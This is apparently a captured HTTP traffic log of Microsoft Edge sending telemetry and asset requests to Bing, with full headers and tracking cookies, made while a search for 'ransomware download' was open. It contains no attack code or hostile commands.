cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
ResponseHTTP/2.0 200
content-length: 373
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a39106d74984b77c9efdebe1b803
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-tOMZ7AnvBjMlnHWndMf/76F/zmrRfwemiTwBNkcNgA0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 2AD10A7C94D842649944A557753C2DA3 Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327820
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220749713%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749749%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749809%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220750015%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220749713%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749749%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749809%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220750015%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2628A2E32A9E422FA7486015BC301B2B Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327839
-
GEThttps://www.bing.com/welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903msedge.exeRemote address:92.123.128.152:443RequestGET /welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A53B87F56AA43E59A210235A03E7CCF Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b32786a
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F33CE882B899457CA7288275F7A0599F Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327884
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1427659DD8C7444DB996E22DFDBB868D Ref B: LTSEDGE2115 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327889
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 329
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1C0C7E2F13164EFA93902CA32D93B883 Ref B: LON04EDGE0720 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327896
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 415
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 37256DB8724747F7ADFAE9123ABF44DA Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
